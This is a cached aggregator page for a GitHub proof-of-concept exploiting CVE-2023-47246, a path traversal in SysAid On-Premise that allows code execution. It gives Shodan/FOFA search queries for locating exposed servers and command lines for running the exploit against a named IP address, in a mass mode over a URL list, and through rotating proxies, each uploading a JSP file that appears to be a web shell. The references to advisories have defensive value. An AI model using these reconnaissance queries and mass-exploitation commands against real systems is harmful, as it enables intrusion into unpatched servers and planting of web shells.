CVE-2023-47246 PoC — Sysaid Technologies SysAid 安全漏洞

Source

https://github.com/tucommenceapousser/CVE-2023-47246

Associated Vulnerability

Title:Sysaid Technologies SysAid 安全漏洞 (CVE-2023-47246)
Description:Sysaid Technologies SysAid是以色列Sysaid Technologies公司的一套IT服务管理解决方案。SysAid On-Premise是SysAid的本地安装版。 Sysaid Technologies SysAid On-Premise 23.3.36之前版本存在安全漏洞，该漏洞源于存在路径遍历漏洞。攻击者可利用的该漏洞将文件写入Tomcat webroot后执行代码。

Readme

# Vulnerability details

## Clone on replit:
[![Run on Replit](https://replit.com/badge/github/tucommenceapousser/CVE-2023-47246)](https://replit.com/github/tucommenceapousser/CVE-2023-47246)

1. fofa:

   ```text
   body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
   ```

shodan
```
http.favicon.hash:1540720428
```


onyphe.io

[https://www.onyphe.io/search?q=category%3Adatascan+cpe%3A%22cpe%3A%2Fa%3Asysaid%3Ahelp_desk_software%3A-%22&g-recaptcha-response=03AFcWeA4VpQc5UkjerpJN4kqs4NuRTBE29ETcWwuCe_m7z9mois24KksasmCqHjKpxiqSfOFQbQyiE75p4ep5BmmV_E84sYo1qVr0MD5ZI3N4Cl3E12H0Mzg-BQcL7162ubWtvlKd6LxqbWgF9eejffE7iBoGsLsQap-e2STsDz-kIWCxXftSKOaNVpSKCR9HUa7N1xZshO-0LQqKhfggsSWVi7SZI7gXqo016j4Fn-qkJ59MEpBbt3GCGsAuw4pokNe0kbuQeNErxqRPsRau9JaCjqnVhCq7usf_kl9ZR2D5p6Jd16FhezGLI3TNQCruvVd9OYJbI5BYYj49Z_WQ4ZYw0BXZyY8zH1qqCubKf9R8-YeXrEAK7ey3Kr7mTPyuqJvtN0r-umi7jYLYXDQGoXKOCwSXcBBUcwMOWuU2Q5Bs8ICDL3ZekNjeCkPM9ATqD6IKjiztjSm4uaWlgob8RkLArTWUypLAArcxTs3wYTApWofwV8nuC_0KuSM4o-LSwM6fV0VW_kCv8-OzTVx9h5QeobTFMTLXWy3gDOaicaMuvVvFX5Xqsw4CmZR5-2k5VhXKB7izzoar
](https://t.co/oeRLgORoIv)


2. Affected versions: SysAid Server<23.3.36

# Vulnerability recurrence

1. Execute the script:

33 Mode Single
   ```shell
   git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
   cd CVE-2023-47246
   pip install -r requirements.txt
   chmod +x expp
   ./expp -u https://170.82.173.30:443 -f def.jsp
   ```
## Mode Mass
   ```shell
   git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
   cd CVE-2023-47246
   pip install -r requirements.txt
   chmod +x expp
   ./expp -m urls.txt -f def.jsp
   ```

## Mode Proxy-List
   ```shell
   git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
   cd CVE-2023-47246
   pip install -r requirements.txt
   chmod +x exp
   ./exp -m urls.txt --proxy-list proxies.txt -f def.jsp
   ```
2. result:![](https://static-trkn.replit.app/47246.jpg)

# On replit
change the first lign of exp
```
#!venv/bin/python
```
use this command
```
python -m venv venv
```
```
source venv/bin/activate
```
```
chmod +x exp
```
```
exp -m urls.txt -f def.jsp
```

# Reference

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml  
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246  
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification  
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability

File Snapshot


 [4.0K]  /data/pocs/8d48e051916118410466ff685cd4950e28d1d9b0
├── [ 25K]  def.jsp
├── [1.8K]  defo.jsp
├── [3.9K]  exp
├── [3.9K]  expp
├── [ 11K]  LICENSE
├── [2.4K]  proxies.txt
├── [2.5K]  README.md
└── [1.9K]  urls.txt

0 directories, 8 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!